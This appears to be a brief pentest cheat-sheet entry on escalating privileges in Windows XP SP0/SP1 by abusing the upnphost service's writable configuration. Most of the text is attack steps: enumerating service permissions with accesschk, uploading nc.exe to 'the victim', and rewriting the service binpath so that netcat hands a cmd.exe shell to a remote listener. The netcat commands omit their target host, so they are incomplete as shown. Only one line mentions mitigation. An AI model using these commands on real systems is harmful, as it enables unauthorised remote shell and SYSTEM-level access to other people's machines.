Windows XP SP0/SP1 Priv esc


This vuln didn't show up on windows exploit suggester.

if the system meets the requirement,

transfer the exe file with binary mode

and run

C:\> accesschk.exe /accepteula -uwcqv "Authenticated Users" *

once you follow everything from the article, you can upload a nc.exe to the victim

sc config upnphost binpath= "C:\Inetpub\Scripts\nc.exe -nv 6666 -e C:\WINDOWS\System32\cmd.exe"

To get a stable shell, immediately run the following command (check the path)

C:\inetpub\scripts\nc.exe -nv 4445 -e C:\WINDOWS\System32\cmd.exe

Mitigation is upgrade to Windows XP SP2 or higher

Last updated